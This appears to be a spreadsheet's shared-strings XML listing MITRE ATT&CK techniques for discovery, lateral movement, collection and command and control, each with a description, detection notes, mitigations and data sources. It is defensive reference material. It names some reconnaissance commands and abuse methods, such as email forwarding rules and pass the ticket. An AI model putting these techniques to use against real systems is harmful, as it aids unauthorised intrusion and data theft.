  <si>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File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1083</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</si>
  <si>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</si>
  <si>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</si>
  <si>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or cloud services enabled within the environment. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems.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</si>
  <si>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</si>
  <si>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Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.
Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1046</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery</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</si>
  <si>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
### Cloud
Cloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)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</si>
  <si>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In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters, Network protocol analysis, Process use of network</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1135</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mitigating discovery of password policies is not advised since the information is required to be known by systems and users of a network. Ensure password policies are such that they mitigate brute force attacks yet will not give an adversary an information advantage because the policies are too light. Active Directory is a common way to set and enforce password policies throughout an enterprise network. (Citation: Microsoft Password Complexity)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1201</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>PowerShell logs, API monitoring, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</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</si>
  <si>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
### Office 365 and Azure AD
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft msrole)(Citation: GitHub Raindance)
Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions,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</si>
  <si>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https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software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 Windows
An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility.
### Mac and Linux
In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt;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</si>
  <si>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</si>
  <si>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acquire information about processes,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</si>
  <si>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https://attack.mitre.org/techniques/T1057</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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acquire information within the Registry,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</si>
  <si>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https://attack.mitre.org/techniques/T1012</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery</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</si>
  <si>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t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Network protocol analysis, Process monitoring, Process use of network, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1018</t>
  </si>
  <si>
    <t>T1063</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.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</si>
  <si>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</si>
  <si>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acquire information about local security software,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</si>
  <si>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https://attack.mitre.org/techniques/T1063</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1518</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</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</si>
  <si>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In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about the operating system and underlying hardware, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Azure activity logs, Stackdriver logs, AWS CloudTrail logs, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</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</si>
  <si>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</si>
  <si>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Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system's network configuration,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</si>
  <si>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https://attack.mitre.org/techniques/T1016</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections,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</si>
  <si>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https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>System Owner/User Discovery</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</si>
  <si>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 Mac
On Mac, the currently logged in user can be identified with &lt;code&gt;users&lt;/code&gt;,&lt;code&gt;w&lt;/code&gt;, and &lt;code&gt;who&lt;/code&gt;.
### Linux
On Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users,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</si>
  <si>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https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>System Service Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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acquire information about services,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</si>
  <si>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https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.
Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information,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</si>
  <si>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https://attack.mitre.org/techniques/T1124</t>
  </si>
  <si>
    <t>TA0008</t>
  </si>
  <si>
    <t>Lateral Movement</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).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</si>
  <si>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https://attack.mitre.org/techniques/T1017</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Exploitation of Remote Services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</si>
  <si>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</si>
  <si>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Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods. Minimize available services to only those that are necessary. Regularly scan the internal network for available services to identify new and potentially vulnerable services. Minimize permissions and access for service accounts to limit impact of exploitation.
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exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)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all software or services targeted.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1210</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Attachment](https://attack.mitre.org/techniques/T1193) or [Spearphishing Link](https://attack.mitre.org/techniques/T1192)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</si>
  <si>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</si>
  <si>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SSL/TLS inspection, DNS records, Anti-virus, Web proxy</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1534</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor systems and domain logs for unusual credential logon activity. Prevent access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.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 (Citation: GitHub IAD Secure Host Baseline UAC Filtering)
Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary's ability to perform Lateral Movement between systems. Ensure that built-in and created local administrator accounts have complex, unique passwords. Do not allow a domain user to be in the local administrator group on multiple systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1075</t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>Pass the Ticket</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts. (Citation: ADSecurity AD Kerberos Attacks)
For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. (Citation: CERT-EU Golden Ticket Protection)
Attempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1097</t>
  </si>
  <si>
    <t>T1076</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins. (Citation: Berkley Secure) Do not leave RDP accessible from the internet. Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server. (Citation: Windows RDP Sessions)</t>
  </si>
  <si>
    <t>Remote Desktop Users, User</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1076</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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command-and-control, lateral-movement</t>
  </si>
  <si>
    <t>File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>An adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</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</si>
  <si>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</si>
  <si>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Limit the number of accounts that may use remote services. Use multifactor authentication where possible. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs. Prevent Credential Access techniques that may allow an adversary to acquire [Valid Accounts](https://attack.mitre.org/techniques/T1078) that can be used by existing services.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>Shared Webroot</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.
Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems. (Citation: acunetix Server Secuirty) (Citation: NIST Server Security July 2008)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1051</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected. Ensure that all private keys are stored securely in locations where only the legitimate owner has access to with strong passwords and are rotated frequently. Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities. Do not allow remote access via SSH as root or other privileged accounts. Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)</t>
  </si>
  <si>
    <t>User, root</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1184</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Protect shared folders by minimizing users who have write access. Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).
Reduce potential lateral movement risk by using web-based document management and collaboration services that do not use network file and directory sharing.
Identify potentially malicious software that may be used to taint content or may result from it and audit and/or block the unknown programs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>Windows Admin Shares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</si>
  <si>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</si>
  <si>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Lateral Movement)</t>
  </si>
  <si>
    <t>Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.
Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Process use of network, Authentication logs, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1077</t>
  </si>
  <si>
    <t>TA0009</t>
  </si>
  <si>
    <t>Collection</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.
Identify and block potentially malicious software that may be used to record audio by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1123</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Automated Collection</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</si>
  <si>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</si>
  <si>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</si>
  <si>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A keylogger installed on a system may be able to intercept passwords through [Input Capture](https://attack.mitre.org/techniques/T1056) and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.
Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files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</si>
  <si>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https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</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</si>
  <si>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</si>
  <si>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Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality,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</si>
  <si>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https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage Object</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1530</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</si>
  <si>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</si>
  <si>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</si>
  <si>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collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.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</si>
  <si>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</si>
  <si>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To mitigate adversary access to information repositories for collection:
* Develop and publish policies that define acceptable information to be stored
* Appropriate implementation of access control mechanisms that include both authentication and appropriate authorization
* Enforce the principle of least-privilege
* Periodic privilege review of accounts
* Mitigate access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to access repositories</t>
  </si>
  <si>
    <t>Azure activity logs, AWS CloudTrail logs, Stackdriver logs, OAuth audit logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t xml:space="preserve">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
</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</si>
  <si>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</si>
  <si>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collect data from the local system,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</si>
  <si>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https://attack.mitre.org/techniques/T1005</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</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</si>
  <si>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</si>
  <si>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</si>
  <si>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collect data from a network share,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</si>
  <si>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https://attack.mitre.org/techniques/T1039</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>Data from Removable Media</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media,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</si>
  <si>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https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Data Staged</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Identify system utilities, remote access or third-party tools, users or potentially malicious software that may be used to store compressed or encrypted data in a publicly writeable directory, central location, or commonly used staging directories (e.g. recycle bin) that is indicative of non-standard behavior, and audit and/or block them by using file integrity monitoring tools where appropriate. Consider applying data size limits or blocking file writes of common compression and encryption utilities such as 7zip, RAR, ZIP, or zlib on frequently used staging directories or central locations and monitor attempted violations of those restrictions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1074</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t xml:space="preserve">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Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific key words.(Citation: Black Hills MailSniper, 2017)
### Email Forwarding Rule
Adversaries may also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Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: TIMMCMIC, 2014)
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. </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</si>
  <si>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</si>
  <si>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Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.
Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.
Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>Office 365 trace logs, Mail server, Email gateway, Authentication logs</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Man in the Browser</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) opportunities can limit the exposure to this technique. 
Close all browser sessions regularly and when they are no longer needed.</t>
  </si>
  <si>
    <t>Authentication logs, Packet capture, Process monitoring, API monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1185</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1113</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.
Identify and block potentially malicious software that may be used to capture video and images by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>TA0011</t>
  </si>
  <si>
    <t>Command and Control</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/tactics/TA0011</t>
  </si>
  <si>
    <t>T1043</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1043</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor file access on removable media. Detect processes that execute when removable media is mounted.</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>Custom Command and Control Protocol</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.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</si>
  <si>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https://attack.mitre.org/techniques/T1094</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>Custom Cryptographic Protocol</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1024</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Packet capture, Process use of network, Process monitoring, Network protocol analysis</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1001</t>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>Domain Fronting</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</si>
  <si>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</si>
  <si>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</si>
  <si>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If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.
In order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems. (Citation: FireEye APT29 Domain Fronting With TOR March 2017) (Citation: Mandiant No Easy Breach) It may be possible to detect or prevent the installation of these tools with Host-based solutions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1172</t>
  </si>
  <si>
    <t>T1483</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination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</si>
  <si>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or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)</t>
  </si>
  <si>
    <t>This technique may be difficult to mitigate since the domains can be registered just before they are used, and disposed shortly after. Malware researchers can reverse-engineer malware variants that use DGAs and determine future domains that the malware will attempt to contact, but this is a time and resource intensive effort.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA Brute Force) Malware is also increasingly incorporating seed values that can be unique for each instance, which would then need to be determined to extract future generated domains. In some cases, the seed that a particular sample uses can be extracted from DNS traffic.(Citation: Akamai DGA Mitigation) Even so, there can be thousands of possible domains generated per day; this makes it impractical for defenders to preemptively register all possible C2 domains due to the cost. In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.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</si>
  <si>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Process use of network, Packet capture, Network device logs, Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1483</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1026</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [Domain Fronting](https://attack.mitre.org/techniques/T1172).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1188</t>
  </si>
  <si>
    <t>T1079</t>
  </si>
  <si>
    <t>Multilayer Encryption</t>
  </si>
  <si>
    <t>An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</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</si>
  <si>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</si>
  <si>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intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Packet capture, Process use of network, Malware reverse engineering, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1079</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow, Network device logs, Network protocol analysis, Packet capture</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1104</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.
Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to these services as well.
Use application whitelisting to mitigate use of and installation of unapproved software.</t>
  </si>
  <si>
    <t>Network intrusion detection system, Network protocol analysis, Process use of network, Process monitoring</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1219</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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to avoid detection by common defensive tools. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
